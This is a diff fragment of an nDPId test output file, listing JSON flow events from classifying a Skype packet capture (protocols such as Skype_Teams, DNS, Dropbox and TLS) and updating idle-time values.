+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969658376,"flow_last_seen":1431969684569,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969658376,"flow_last_seen":1431969684569,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969788719,"flow_last_seen":1431969803191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969788719,"flow_last_seen":1431969803191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1158,9 +1146,11 @@ 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642247,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":472,"flow_first_seen":1431969710853,"flow_last_seen":1431969807279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":133455,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00641{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":472,"flow_first_seen":1431969710853,"flow_last_seen":1431969807279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":133455,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969712918,"flow_last_seen":1431969747557,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -1179,78 +1169,78 @@ 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777185,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":86,"flow_first_seen":1431969719110,"flow_last_seen":1431969765415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15522,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":86,"flow_first_seen":1431969719110,"flow_last_seen":1431969765415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15522,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969713815,"flow_last_seen":1431969726847,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 